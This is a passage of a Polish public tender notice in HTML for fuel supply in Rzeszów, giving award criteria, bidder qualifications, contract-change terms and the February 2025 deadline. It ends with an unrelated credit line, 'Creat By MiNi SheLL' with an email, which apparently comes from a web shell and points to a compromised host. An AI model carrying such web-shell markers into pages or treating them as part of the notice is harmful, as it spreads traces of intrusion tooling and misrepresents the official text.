części składowe, wydają się rażąco niskie w stosunku do przedmiotu zamówienia lub budzą wątpliwości Zamawiającego co do możliwości wykonania przedmiotu zamówienia zgodnie z wymaganiami określonymi w dokumentach zamówienia lub wynikającymi z odrębnych przepisów, Zamawiający zażąda od Wykonawcy wyjaśnień, w tym złożenia dowodów w zakresie wyliczenia ceny, lub jej istotnych części składowych. Wyjaśnienia mogą dotyczyć zagadnień wskazanych w art. 224 ust. 3 ustawy PZP.<br/>7. Obowiązek wykazania, że oferta nie zawiera rażąco niskiej ceny spoczywa na Wykonawcy.<br/>8. Zamawiający odrzuci ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdzi, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rabat</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość stacji paliw Wykonawcy od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, oraz dotyczące zdolności technicznej lub zawodowej w zakresie potencjału technicznego i infrastruktury niezbędnej do prawidłowej realizacji zamówienia, oraz sytuacji ekonomicznej lub finansowej (art. 112 ust. 2 pkt 2,3 i 4 ustawy Pzp).<br/>2.	W odniesieniu do warunków, o których mowa w ust. 1, Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki umożliwiające realizację zamówienia na odpowiednim poziomie jakości oraz wykazał, że:<br/>1)	spełnia warunek dotyczący posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – tj. posiada aktualną koncesję, potwierdzającą posiadanie uprawnień do wykonywania działalności w zakresie obrotu paliwami ciekłymi (benzyną bezołowiową, olejem napędowym i skroplonym gazem ropopochodnym LPG) wymaganą przepisami ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne (Dz.U. z 2024 r. poz. 266 t.j.) lub równoważny dokument potwierdzający, że Wykonawca posiada uprawnienia do wykonywania działalności w zakresie obrotu paliwami ciekłymi (benzyną bezołowiową, olejem napędowym i skroplonym gazem ropopochodnym LPG);<br/>2)	spełnia warunek dotyczący zdolności technicznej lub zawodowej – tj. dysponuje co najmniej jedną stacją paliw zapewniającą możliwość bezgotówkowego tankowania, za pomocą elektronicznych kart paliwowych, wszystkich paliw będących przedmiotem zamówienia w dni robocze od poniedziałku do piątku w godz. 6.00 - 20.00 a w sobotę w godz. 6.00 – 16.00, położoną w granicach administracyjnych miasta Rzeszowa. <br/>3)	spełnia warunek dotyczący sytuacji ekonomicznej lub finansowej – tj. posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia m.in. w zakresie szkód, które mogą zaistnieć w związku ze zdarzeniami losowymi na sumę gwarancyjną co najmniej 50 000,00 zł.<br/>3.	Wykonawca potwierdza spełnianie warunków, o których mowa w ust. 2 poprzez złożenie oświadczenia – wg wzoru stanowiącego załącznik nr 2 do SWZ, z zastrzeżeniem, że Wykonawca którego oferta zostanie najwyżej oceniona, będzie dodatkowo zobowiązany do złożenia, na wezwanie Zamawiającego i w terminie przez niego wskazanym, podmiotowych środków dowodowych, o których mowa w Rozdziale X SWZ.<br/>4.	Warunek dotyczący uprawnień do prowadzenia określonej działalności, o którym mowa w ust. 2 pkt 1), jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada ww. uprawnienia i zrealizuje dostawy, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia okoliczności: <br/>1)	o których mowa w art. 112 ust. 2 pkt 2 ustawy Pzp w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, określonych w Rozdziale VII ust. 2 pkt. 1) SWZ, Wykonawca przedłoży aktualną koncesję na prowadzenie działalności w zakresie obrotu paliwami objętymi niniejszym zamówieniem, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne. Koncesja musi być ważna w okresie trwania umowy.<br/>2)	o których mowa w art. 112 ust. 2 pkt 4 ustawy Pzp w zakresie zdolności technicznej lub zawodowej, określonych w Rozdziale VII ust. 2 pkt. 2) SWZ, Wykonawca przedłoży wykaz wszystkich stacji paliw na terenie Polski, z wyodrębnieniem stacji paliw spełniających wymagania, o których mowa w Rozdziale VII ust. 2 pkt 2) SWZ – niezbędnych do prawidłowego wykonania zamówienia, wraz z informacją o podstawie do dysponowania tymi zasobami. Wzór wykazu stacji paliw stanowi załącznik nr 5 do SWZ.<br/>3)	o których mowa w art. 112 ust. 2 pkt 3 ustawy Pzp w zakresie sytuacji ekonomicznej lub finansowej, określonych w Rozdziale VII ust. 2 pkt. 3) SWZ, Wykonawca przedłoży opłaconą polisę lub inny dokument potwierdzający posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na sumę gwarancyjną co najmniej 50 000 zł.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o braku podstaw wykluczenia oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 oraz art. 273 ust. 2 ustawy Pzp w zakresie wskazanym przez Zamawiającego, każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielnie jako oświadczenie własne.<br/>2. W odniesieniu do warunków dotyczących posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają dostawy, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają ci poszczególni Wykonawcy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia i/lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru lub wskazania danych umożliwiających Zamawiającemu dostęp do tych dokumentów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ust. 2 ustawy Pzp, dopuszcza się zmiany umowy bez przeprowadzania nowego postępowania o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/>2. Strony przewidują także możliwość wprowadzenia następujących zmian do umowy:<br/>1)	zmiana terminu lub sposobu realizacji umowy ;<br/>2)	zmiana wysokości wynagrodzenia Wykonawcy w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację umowy:<br/>a) zmiany urzędowej stawki podatku VAT oraz podatku akcyzowego;<br/>b)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania umowy.<br/>3. Warunki wprowadzenia zmian zostały opisane w par. 12 Projektowanych Postanowień Umownych, stanowiących załącznik nr 6 do Specyfikacji Warunków Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy e-Zamówienia używając zakładki „Oferty/wnioski”. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag &amp; drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com